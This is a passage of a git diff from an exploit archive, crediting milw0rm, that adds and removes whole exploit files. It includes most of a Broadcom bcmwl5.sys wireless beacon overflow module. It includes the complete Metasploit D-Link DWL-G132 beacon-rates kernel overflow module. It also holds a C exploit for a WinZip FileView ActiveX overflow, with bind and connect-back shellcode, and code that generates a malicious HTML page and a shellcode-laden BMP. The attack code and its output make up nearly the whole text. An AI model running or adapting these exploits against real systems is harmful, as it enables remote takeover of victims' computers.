+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+
+			'Payload'        =>
+				{
+					'Space'    => 500
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
+					[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
+						{
+							'Ret'      => 0x8066662c, # jmp edi
+							'Platform' => 'win',
+							'Payload'  => 
+							{
+								'ExtendedOptions' => 
+								{
+									'Stager'       => 'sud_syscall_hook',
+									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
+									'Recovery'     => 'idlethread_restart',
+									'KiIdleLoopAddress' => 0x804dbb27,										
+										
+								}
+							}
+						} 
+					],
+					
+					# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
+					[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
+						{
+							'Ret'      => 0x804f16eb, # jmp edi
+							'Platform' => 'win',
+							'Payload'  => 
+							{
+								'ExtendedOptions' => 
+								{
+									'Stager'       => 'sud_syscall_hook',
+									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
+									'Recovery'     => 'idlethread_restart',
+									'KiIdleLoopAddress' => 0x804dc0c7,
+								}
+							}
+						} 
+					]					
+				],
+
+			'DefaultTarget' => 0
+			))
+			
+		register_options(
+			[
+				OptString.new('ADDR_DST', [ true,  "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
+				OptInt.new('RUNTIME', [ true,  "The number of seconds to run the attack", 60])
+			], self.class)
+	end
+
+	def exploit
+		open_wifi
+		
+		stime = Time.now.to_i
+		
+		print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
+		
+		while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) 
+			
+			select(nil, nil, nil, 0.02)
+			wifi.write(create_response)
+
+			select(nil, nil, nil, 0.01)
+			wifi.write(create_beacon)
+			
+			break if session_created?
+			
+		end
+		
+		print_status("Finished sending frames...")
+	end
+	
+	def create_beacon
+		src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
+		dst = eton('FF:FF:FF:FF:FF:FF')
+		seq = [Time.now.to_i % 4096].pack('n')
+	
+		blob = create_frame
+		blob[0,1] = 0x80.chr
+		blob[4,6] = dst
+		blob[10,6] = src
+		blob[16,6] = src
+		blob[22,2] = seq
+		
+		blob
+	end
+	
+	def create_response
+		src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
+		dst = eton(datastore['ADDR_DST'])
+		seq = [Time.now.to_i % 256].pack('n')
+	
+		blob = create_frame
+		blob[0,1] = 0x50.chr		
+		blob[4,6] = dst
+		blob[10,6] = src
+		blob[16,6] = src # bssid field, good idea to set to src. 
+		blob[22,2] = seq
+		
+		blob
+	end
+
+	def create_frame
+		"\x80" +                      # type/subtype
+		"\x00" +                      # flags
+		"\x00\x00" +                  # duration  
+		"\xff\xff\xff\xff\xff\xff" +  # dst
+		"\x58\x58\x58\x58\x58\x58" +  # src
+		"\x58\x58\x58\x58\x58\x58" +  # bssid
+		"\x70\xed" +                  # sequence number
+		
+		#
+		# fixed parameters
+		#
+		
+		# timestamp value
+		Rex::Text.rand_text_alphanumeric(8) + 
+		"\x64\x00" +                  # beacon interval
+		"\x11\x04" +                  # capability flags
+		
+		#
+		# tagged parameters
+		#
+		
+		# ssid tag
+		"\x00" + # tag: SSID parameter set
+		"\x5d" + # len: length is 93 bytes
+		
+		# jump into the payload
+		"\x89\xf9" +                 # mov edi, ecx
+		"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
+		"\xff\xe1" +                 # jmp ecx
+		
+		# padding
+		Rex::Text.rand_text_alphanumeric(79) + 
+		
+		# return address
+		[target.ret].pack('V') +
+		
+		# vendor specific tag
+		"\xdd" + # wpa
+		"\xff" + # big as we can make it
+		
+		# the kernel-mode stager
+		payload.encoded
+	end
+	
+end
+end
+
+# milw0rm.com [2006-11-13]
diff --git a/platforms/windows/remote/2771.rb b/platforms/windows/remote/2771.rb
index db54affbb..1885c9739 100755
--- a/platforms/windows/remote/2771.rb
+++ b/platforms/windows/remote/2771.rb
@@ -1,189 +1,189 @@
-require 'msf/core'
-
-module Msf
-
-class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote
-
-	include Exploit::Lorcon
-	include Exploit::KernelMode	
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
-			'Description'    => %q{
-				This module exploits a stack overflow in the A5AGU.SYS driver provided
-			with the D-Link DWL-G132 USB wireless adapter. This stack overflow 
-			allows remote code execution in kernel mode. The stack overflow is triggered
-			when a 802.11 Beacon frame is received that contains a long Rates information
-			element. This exploit was tested with version 1.0.1.41 of the 
-			A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
-			versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
-			adapter and appear to resolve this flaw, but D-Link does not offer an updated
-			driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
-			all cards within range of the attack will be affected. The tested adapter used
-			a MAC address in the range of 00:11:95:f2:XX:XX. 
-			
-			Vulnerable clients will need to have their card in a non-associated state
-			for this exploit to work. The easiest way to reproduce this bug is by starting
-			the exploit and then accessing the Windows wireless network browser and
-			forcing it to refresh.
-			
-			D-Link was NOT contacted about this flaw. A search of the SecurityFocus
-			database indicates that D-Link has not provided an official patch or
-			solution for any of the seven flaws listed at the time of writing:
-			(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
-			
-			This module depends on the Lorcon library and only works on the Linux platform
-			with a supported wireless card. Please see the Ruby Lorcon documentation 
-			(external/ruby-lorcon/README) for more information.
-			},
-			
-			'Authors'        => 
-				[
-					'hdm',	# discovery, exploit dev
-					'skape', # windows kernel ninjitsu
-					'Johnny Cache ' # making all of this possible
-				],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 3583 $',
-			'References'     =>
-				[
-					['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
-				],
-			'Privileged'     => true,
-                        
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'thread',
-				},
-
-			'Payload'        =>
-				{
-					# Its a beautiful day in the neighborhood...
-					'Space'    => 1000
-				},
-			'Platform'       => 'win',
-			'Targets'        => 
-				[
-					# Windows XP SP2 with the latest updates
-					# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
-					[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
-						{
-							'Ret'      => 0x8066662c, # jmp edi
-							'Platform' => 'win',
-							'Payload'  => 
-							{
-								'ExtendedOptions' => 
-								{
-									'Stager'       => 'sud_syscall_hook',
-									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
-									'Recovery'     => 'idlethread_restart',
-									'KiIdleLoopAddress' => 0x804dbb27,
-								}
-							}
-						} 
-					],
-					
-					# Windows XP SP2 install media, no patches
-					# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
-					[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
-						{
-							'Ret'      => 0x804f16eb, # jmp edi
-							'Platform' => 'win',
-							'Payload'  => 
-							{
-								'ExtendedOptions' => 
-								{
-									'Stager'       => 'sud_syscall_hook',
-									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
-									'Recovery'     => 'idlethread_restart',
-									'KiIdleLoopAddress' => 0x804dc0c7,
-								}
-							}
-						} 
-					]					
-				],
-
-
-			'DefaultTarget' => 0
-			))
-			
-		register_options(
-			[
-				OptString.new('ADDR_DST', [ true,  "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
-				OptInt.new('RUNTIME', [ true,  "The number of seconds to run the attack", 60])
-			], self.class)
-	end
-	
-	def exploit
-		open_wifi
-		
-		stime = Time.now.to_i
-		rtime = datastore['RUNTIME'].to_i
-		count = 0
-		
-		print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
-		while (stime + rtime > Time.now.to_i) 
-			wifi.write(create_beacon)
-			select(nil, nil, nil, 0.10) if (count % 100 == 0)
-			
-			count += 1
-			
-			# Exit if we get a session
-			break if session_created?
-		end
-		
-		print_status("Completed sending beacons.")
-	end
-
-
-#
-# The long rates field bug can be triggered three different ways (at least):
-# 1) Send a single rates IE with valid rates up front and long data
-# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
-# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
-#
-	def create_beacon
-
-		ssid   = Rex::Text.rand_text_alphanumeric(6)
-		bssid  = ("\x00" * 2) + Rex::Text.rand_text(4)
-		src    = ("\x90" * 4) + "\xeb\x2b"
-		seq    = [rand(255)].pack('n')
-
-		buff  =  Rex::Text.rand_text(75)
-		buff[0, 2]  = "\xeb\x49"
-		buff[71, 4] = [target.ret].pack('V')
-		
-		frame =
-			"\x80" +                      # type/subtype
-			"\x00" +                      # flags
-			"\x00\x00" +                  # duration  
-			"\xff\xff\xff\xff\xff\xff" +  # dst
-			src   +                       # src
-			bssid +                      # bssid
-			seq   +                       # seq  
-			Rex::Text.rand_text(8) +      # timestamp value
-			"\x64\x00" +                  # beacon interval
-			"\x00\x05" +                  # capability flags
-			
-			# ssid tag
-			"\x00" + ssid.length.chr + ssid +
-
-			# supported rates
-			"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
-
-			# current channel
-			"\x03" + "\x01" + channel.chr +
-
-			# eip was his name-o
-			"\x01" + buff.length.chr + buff + 
-
-			payload.encoded
-								
-		return frame
-	end
-
-end
-end
-
-# milw0rm.com [2006-11-13]
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote
+
+	include Exploit::Lorcon
+	include Exploit::KernelMode	
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in the A5AGU.SYS driver provided
+			with the D-Link DWL-G132 USB wireless adapter. This stack overflow 
+			allows remote code execution in kernel mode. The stack overflow is triggered
+			when a 802.11 Beacon frame is received that contains a long Rates information
+			element. This exploit was tested with version 1.0.1.41 of the 
+			A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
+			versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
+			adapter and appear to resolve this flaw, but D-Link does not offer an updated
+			driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
+			all cards within range of the attack will be affected. The tested adapter used
+			a MAC address in the range of 00:11:95:f2:XX:XX. 
+			
+			Vulnerable clients will need to have their card in a non-associated state
+			for this exploit to work. The easiest way to reproduce this bug is by starting
+			the exploit and then accessing the Windows wireless network browser and
+			forcing it to refresh.
+			
+			D-Link was NOT contacted about this flaw. A search of the SecurityFocus
+			database indicates that D-Link has not provided an official patch or
+			solution for any of the seven flaws listed at the time of writing:
+			(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
+			
+			This module depends on the Lorcon library and only works on the Linux platform
+			with a supported wireless card. Please see the Ruby Lorcon documentation 
+			(external/ruby-lorcon/README) for more information.
+			},
+			
+			'Authors'        => 
+				[
+					'hdm',	# discovery, exploit dev
+					'skape', # windows kernel ninjitsu
+					'Johnny Cache ' # making all of this possible
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 3583 $',
+			'References'     =>
+				[
+					['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
+				],
+			'Privileged'     => true,
+                        
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+
+			'Payload'        =>
+				{
+					# Its a beautiful day in the neighborhood...
+					'Space'    => 1000
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					# Windows XP SP2 with the latest updates
+					# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
+					[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
+						{
+							'Ret'      => 0x8066662c, # jmp edi
+							'Platform' => 'win',
+							'Payload'  => 
+							{
+								'ExtendedOptions' => 
+								{
+									'Stager'       => 'sud_syscall_hook',
+									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
+									'Recovery'     => 'idlethread_restart',
+									'KiIdleLoopAddress' => 0x804dbb27,
+								}
+							}
+						} 
+					],
+					
+					# Windows XP SP2 install media, no patches
+					# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
+					[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
+						{
+							'Ret'      => 0x804f16eb, # jmp edi
+							'Platform' => 'win',
+							'Payload'  => 
+							{
+								'ExtendedOptions' => 
+								{
+									'Stager'       => 'sud_syscall_hook',
+									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
+									'Recovery'     => 'idlethread_restart',
+									'KiIdleLoopAddress' => 0x804dc0c7,
+								}
+							}
+						} 
+					]					
+				],
+
+
+			'DefaultTarget' => 0
+			))
+			
+		register_options(
+			[
+				OptString.new('ADDR_DST', [ true,  "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
+				OptInt.new('RUNTIME', [ true,  "The number of seconds to run the attack", 60])
+			], self.class)
+	end
+	
+	def exploit
+		open_wifi
+		
+		stime = Time.now.to_i
+		rtime = datastore['RUNTIME'].to_i
+		count = 0
+		
+		print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
+		while (stime + rtime > Time.now.to_i) 
+			wifi.write(create_beacon)
+			select(nil, nil, nil, 0.10) if (count % 100 == 0)
+			
+			count += 1
+			
+			# Exit if we get a session
+			break if session_created?
+		end
+		
+		print_status("Completed sending beacons.")
+	end
+
+
+#
+# The long rates field bug can be triggered three different ways (at least):
+# 1) Send a single rates IE with valid rates up front and long data
+# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
+# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
+#
+	def create_beacon
+
+		ssid   = Rex::Text.rand_text_alphanumeric(6)
+		bssid  = ("\x00" * 2) + Rex::Text.rand_text(4)
+		src    = ("\x90" * 4) + "\xeb\x2b"
+		seq    = [rand(255)].pack('n')
+
+		buff  =  Rex::Text.rand_text(75)
+		buff[0, 2]  = "\xeb\x49"
+		buff[71, 4] = [target.ret].pack('V')
+		
+		frame =
+			"\x80" +                      # type/subtype
+			"\x00" +                      # flags
+			"\x00\x00" +                  # duration  
+			"\xff\xff\xff\xff\xff\xff" +  # dst
+			src   +                       # src
+			bssid +                      # bssid
+			seq   +                       # seq  
+			Rex::Text.rand_text(8) +      # timestamp value
+			"\x64\x00" +                  # beacon interval
+			"\x00\x05" +                  # capability flags
+			
+			# ssid tag
+			"\x00" + ssid.length.chr + ssid +
+
+			# supported rates
+			"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
+
+			# current channel
+			"\x03" + "\x01" + channel.chr +
+
+			# eip was his name-o
+			"\x01" + buff.length.chr + buff + 
+
+			payload.encoded
+								
+		return frame
+	end
+
+end
+end
+
+# milw0rm.com [2006-11-13]
diff --git a/platforms/windows/remote/2785.c b/platforms/windows/remote/2785.c
index 37524429e..9410ad83a 100755
--- a/platforms/windows/remote/2785.c
+++ b/platforms/windows/remote/2785.c
@@ -1,315 +1,315 @@
-/* WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit
- * ============================================================
- * A vulnerability has been identified within Winzip that allows remote
- * attackers to execute arbitrary code. User interaction is required to 
- * exploit this vulnerability in that the target must visit a malicious 
- * web page. The flaw exists within "FileView" ActiveX control which 
- * contains stack based overflow conditions. This exploit generates a 
- * malicious html page and contains shellcode embedded within an image
- * file. Due to the random nature of the heap, this exploit uses hard
- * coded location of the image bytes within the heap and as such is
- * unreliable in exploitation of this bug, but has approximately 1 in
- * 6 hit ratio within the tested environment. 
- *
- * Example.
- * $ ./prdelka-vs-MS-winzip -f index.html -i foo.bmp -s 0 -t 0
- * [ WinZip <= 10.0.7245 FileView ActiveX overflow exploit
- * [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
- * [ Using target 'WinXP SP2(en) WinZIP 10.0.6667'
- * [ Creating image containing shellcode 'foo.bmp'
- * [ Creating html exploit page 'index.html'
- * $
- * ... clicky clicky MSIE ...
- * $ telnet 192.168.1.223 4444
- * Connected to 192.168.1.223.
- * Escape character is '^]'.
- * 
- * Microsoft Windows XP [Version 5.1.2600]
- * (C) Copyright 1985-2001 Microsoft Corp.
- * 
- * C:\Documents and Settings\User\Desktop>
- *
- * - prdelka
- */
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-
-#define NOPSIZE 999999
-
-struct target {
-        char* name;
-        int retaddr;
-};
-
-struct shellcode {
-        char* name;
-        short port;
-        int host;
-        char* shellcode;
-};
-
-int targetno = 1;
-
-struct target targets[] = {
-        {"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
-	/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
-};
-
-int shellno = 2;
-
-struct shellcode shellcodes[] = {
-        {"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
-        "\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
-        "\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
-        "\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
-        "\x93\x46\x2f\x90\xfd\x4a\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b"
-        "\x81\x73\x13\xbc\xe8\x2b\x27\x83\xeb\xfc\xe2\xf4\x3d\x2c\x7f\xd5"
-        "\x43\x17\xd7\x4d\x57\xa5\xc3\xde\x43\x17\xd4\x47\x37\x84\x0f\x03"
-        "\x37\xad\x17\xac\xc0\xed\x53\x26\x53\x63\x64\x3f\x37\xb7\x0b\x26"
-        "\x57\xa1\xa0\x13\x37\xe9\xc5\x16\x7c\x71\x87\xa3\x7c\x9c\x2c\xe6"
-        "\x76\xe5\x2a\xe5\x57\x1c\x10\x73\x98\xc0\x5e\xc2\x37\xb7\x0f\x26"
-        "\x57\x8e\xa0\x2b\xf7\x63\x74\x3b\xbd\x03\x28\x0b\x37\x61\x47\x03"
-        "\xa0\x89\xe8\x16\x67\x8c\xa0\x64\x8c\x63\x6b\x2b\x37\x98\x37\x8a"
-        "\x37\xa8\x23\x79\xd4\x66\x65\x29\x50\xb8\xd4\xf1\xda\xbb\x4d\x4f"
-        "\x8f\xda\x43\x50\xcf\xda\x74\x73\x43\x38\x43\xec\x51\x14\x10\x77"
-        "\x43\x3e\x74\xae\x59\x8e\xaa\xca\xb4\xea\x7e\x4d\xbe\x17\xfb\x4f"
-        "\x65\xe1\xde\x8a\xeb\x17\xfd\x74\xef\xbb\x78\x74\xff\xbb\x68\x74"
-        "\x43\x38\x4d\x4f\xad\xb4\x4d\x74\x35\x09\xbe\x4f\x18\xf2\x5b\xe0"
-        "\xeb\x17\xfd\x4d\xac\xb9\x7e\xd8\x6c\x80\x8f\x8a\x92\x01\x7c\xd8"
-        "\x6a\xbb\x7e\xd8\x6c\x80\xce\x6e\x3a\xa1\x7c\xd8\x6a\xb8\x7f\x73"
-        "\xe9\x17\xfb\xb4\xd4\x0f\x52\xe1\xc5\xbf\xd4\xf1\xe9\x17\xfb\x41"
-        "\xd6\x8c\x4d\x4f\xdf\x85\xa2\xc2\xd6\xb8\x72\x0e\x70\x61\xcc\x4d"
-        "\xf8\x61\xc9\x16\x7c\x1b\x81\xd9\xfe\xc5\xd5\x65\x90\x7b\xa6\x5d"
-        "\x84\x43\x80\x8c\xd4\x9a\xd5\x94\xaa\x17\x5e\x63\x43\x3e\x70\x70"
-        "\xee\xb9\x7a\x76\xd6\xe9\x7a\x76\xe9\xb9\xd4\xf7\xd4\x45\xf2\x22"
-        "\x72\xbb\xd4\xf1\xd6\x17\xd4\x10\x43\x38\xa0\x70\x40\x6b\xef\x43"
-        "\x43\x3e\x79\xd8\x6c\x80\x55\xff\x5e\x9b\x78\xd8\x6a\x17\xfb\x27"},
-        {"Win32 x86 connect() shellcode (4444/tcp default)",167,160,
-        "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
-        "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
-        "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
-        "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
-        "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
-        "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
-        "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
-        "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
-        "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
-        "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
-        "\x01\x02\x03\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9"
-        "\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
-        "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
-        "\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
-        "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
-        "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
-        "\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
-        "\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"}
-};
-
-char html1[]="\r\n\r\n\r\n\r\n"
-	     "\r\n\r\n\r\n\r\n\r"
-	     "\n\r\n\r\n";
-
-
-char bmphdr[]="\x42\x4d\x3e\xbb\x2d\x00\x00\x00\x00\x00\x36\x00\x00"
-	      "\x00\x28\x00\x00\x00\xe7\x03\x00\x00\xe7\x03\x00\x00"
-	      "\x01\x00\x18\x00\x00\x00\x00\x00\x08\xbb\x2d\x00\x00"
-	      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-	      "\x00\x00";
-int ret;
-
-void help(char* progname){
-	int count;
-	printf("[ Usage instructions.\n[\n");
-	printf("[ %s  (optional)\n[\n[   --filename|-f \n",progname);
-	printf("[   --imgname|-i \n[   --shellcode|-s \n");
-	printf("[   --shellport|-p (port)\n");
-	printf("[   --shellhost|-i (ip)\n");
-	printf("[   --target|-t \n[\n");
-	printf("[ Target#'s\n");
-	for(count = 0;count <= targetno - 1;count++){
-        	printf("[ %d %s 0x%x\n",count,targets[count],targets[count]);
-	}
-	printf("[\n[ Shellcode#'s\n");
-	for(count = 0;count <= shellno - 1;count++){
-        	printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));
-	}
-	exit(0);
-}
-
-void setret(char* retarg){
-	int value = atoi(retarg);
-	switch(value){
-		case 0:
-			printf("[ Using target '%s'\n",targets[ret].name);
-			ret = targets[ret].retaddr;
-			break;
-		default:
-			ret = strtoul(retarg,NULL,16);
-			printf("[ Using return address '0x%x'\n",ret);
-			break;
-	}
-}
-
-int main(int argc, char* argv[]){
-	unsigned long i, fd;
-	int c, index, payg, paya, lhost;
-	short shellport, shellport2;
-	int ishell = 0, itarg = 0;
-	char *buffer, *file, *img, *payload;
-        static struct option options[] = {
-                {"filename", 1, 0, 'f'},
-                {"imgname", 1, 0, 'i'},
-                {"target", 1, 0, 't'},
-                {"shellcode", 1, 0, 's'},
-                {"shellport", 1, 0, 'p'},
-                {"shellhost", 1, 0, 'd'},
-                {"help", 0, 0,'h'}
-        };
-	printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploit\n");
-        while(c != -1){
-		c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index);
-		switch(c){
-			case 'f':
-				file = optarg;
-				break;
-			case 'i':
-				img = optarg;
-				break;
-			case 't':
-				itarg = 1;
-				setret(optarg);
-				if(strlen((char*)&ret) < 4){
-					fprintf(stderr,"[ Selected target contains a null address!\n");	
-					exit(-1);
-				}
-				break;
-			case 's':
-                                if(ishell==0){
-                                payg = atoi(optarg);
-				switch(payg){
-                                case 0:
-                               		printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
-                                        payload = malloc(strlen(shellcodes[payg].shellcode)+1);
-                                        memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
-                                        memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
-                                        shellport2 = 4444;
-                                        ishell = 1;
-                                        break;
-                                case 1:
-                                	printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
-                                	payload = malloc(strlen(shellcodes[payg].shellcode)+1);
-                                	memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
-                                	memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
-                                	shellport2 = 4444;
-                                	ishell = 1;
-                                	break;
-                                default:
-                                        printf("[ Invalid shellcode selection %d\n",payg);
-                                        exit(0);
-                                        break;
-				}
-				}
-				break;
-			case 'p':
-                                if(ishell==1){
-                                        if(shellcodes[payg].port > -1){
-                                                paya = strlen(payload);
-                                                shellport = atoi(optarg);
-                                                shellport2 = shellport;
-                                                shellport =(shellport&0xff)<<8 | shellport>>8;
-                                                memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));
-                                                if(paya > strlen(payload)) {
-                                                        printf("[ Error shellcode port introduces null bytes\n");
-                                                        exit(1);
-                                                }
-						printf("[ Shellcode port changed to '%u'\n",atoi(optarg));
-                                        }
-                                        else{
-                                                printf("[ (%s) port selection is ignored for current shellcode\n",optarg);
-                                        }
-                                }
-                                else{
-                                        printf("[ No shellcode selected yet, ignoring (%s) port selection\n",optarg);
-                                }
-				break;
-			case 'd':
-			        if(ishell==1){
-                                	if(shellcodes[payg].host > -1){
-                              			paya = strlen(payload);
-                                		lhost = inet_addr(optarg);
-                                		memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));
-                                		if(paya > strlen(payload)){
-                                			printf("[ Error shellhost introduces null bytes\n");
-                                			exit(1);
-                                		}
-						printf("[ Shellhost has been changed to '%s'\n",optarg);
-                                	}
-                                	else{
-                                		printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg);
-                                	}
-                               	}
-                                else {
-                                	printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg);
-                                }
-				break;
-			case 'h':
-				help(argv[0]);
-				break;
-			default:
-				break;
-		}
-	}
-	if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){
-		printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]);
-		exit(0);
-	}
-
-// create image
-	printf("[ Creating image containing shellcode '%s'\n",img);
-	fd = open(img,O_RDWR|O_CREAT,S_IRWXU);
-	if(fd == -1){
-		fprintf(stderr,"[ Error creating %s\n",file);
-		exit(-1);
-	}
-	write(fd,bmphdr,sizeof(bmphdr));
-	for(i = 0;i < NOPSIZE;i++){
-		write(fd,"\x90",1);
-	}
-	write(fd,payload,strlen(payload));
-	close(fd);
-
-// create html
-	printf("[ Creating html exploit page '%s'\n",file);
-	fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
-        if(fd == -1){
-		fprintf(stderr,"[ Error creating %s\n",file);
-                exit(-1);
-        }
-	write(fd,html1,strlen(html1));
-	for(i = 0;i < 265;i++){
-		write(fd,"A",1);
-	}
-	write(fd,&ret,4);
-	for(i = 0;i < 1827;i++){
-		write(fd,"A",1);
-	}
-	write(fd,html2,strlen(html2));
-	write(fd,img,strlen(img));
-	write(fd,html3,strlen(html3));
-        close(fd);
-}
-
-// milw0rm.com [2006-11-15]
+/* WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit
+ * ============================================================
+ * A vulnerability has been identified within Winzip that allows remote
+ * attackers to execute arbitrary code. User interaction is required to 
+ * exploit this vulnerability in that the target must visit a malicious 
+ * web page. The flaw exists within "FileView" ActiveX control which 
+ * contains stack based overflow conditions. This exploit generates a 
+ * malicious html page and contains shellcode embedded within an image
+ * file. Due to the random nature of the heap, this exploit uses hard
+ * coded location of the image bytes within the heap and as such is
+ * unreliable in exploitation of this bug, but has approximately 1 in
+ * 6 hit ratio within the tested environment. 
+ *
+ * Example.
